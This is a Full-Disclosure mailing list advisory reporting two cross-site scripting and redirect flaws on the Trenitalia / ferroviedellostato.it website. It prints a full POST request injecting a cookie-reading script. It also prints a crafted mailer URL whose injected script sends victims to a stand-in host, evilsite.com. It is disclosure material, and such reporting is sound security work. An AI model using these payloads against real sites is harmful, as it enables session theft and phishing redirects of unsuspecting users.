[-] Overview

Trenitalia.com is the website of the most important railway company in
Italy.
In this website, I've been discovered two vulnerabilities that allow
attacker to
execute arbitrary javascript code via XSS or URL redirect.


[-] Vulnerability Description


In the first vulnerability, it's necessary to sending POST request, adding
in POSTDATA textfield variable arbitrary HTML commands as following:


POST
http://www.ferroviedellostato.it/ferrovie/v/index.jsp?vgnextoid=c813055409b8
c010VgnVCM1001002f2af90aRCRD
Host=www.ferroviedellostato.it
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.1.5)
Gecko/20070713 Firefox/2.0.0.5
Accept= */*
Accept-Language= it
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Connection=keep-alive
Referer=http://www.ferroviedellostato.it/
Cookie=JSESSIONID=0000K_6eq2u2Z8MaLviVwAgmxu1:123p65u0i
Content-Type=application/x-www-form-urlencoded
Content-Length=63
POSTDATA=textfield=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E



------ - - - - - - - - -


In the second one, the ffss_mailer.jsp page generates a mail form to send
an invite to friend, but it allows user to add in textfield variable
arbitraty HTML code, creating a malicious mail that contains URL redirect
or XSS attack:

this is an example ( evilsite.com must be replaced with the site to
redirect )

http://www.ferroviedellostato.it/ferrovie/mails/ffss_mailer.jsp?vgnextoid=c8
13055209b8c010VgnVCM1000002f2af90aRCRD&textfield=</span></p>%3Cscript%3Eloca
tion.href='http://evilsite.com'%3C/script%3E',%20\'width=516,height=255,stat
us=yes',%20'width=516,height=255,status=yes


[-] Additional Information

Vulnerability screenshots are available at these URLs:

http://exploit.blogosfere.it/images/trenitaliamail.jpg/screenMail.jpg
http://exploit.blogosfere.it/images/trenitaliaMainPage.jpg/trenitaliaPage.jp
g


[-] Company Notification
 
Trenitalia.com has been notified


[-] Credits
 
The vulnerability was discovered by Davide Denicolo



Davide Denicolo
davide <~@~> securityinfos < . > com
http://exploit.blogosfere.it

--------------------------------------------------------------------
mail2web LIVE – Free email based on Microsoft® Exchange technology -
http://link.mail2web.com/LIVE


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/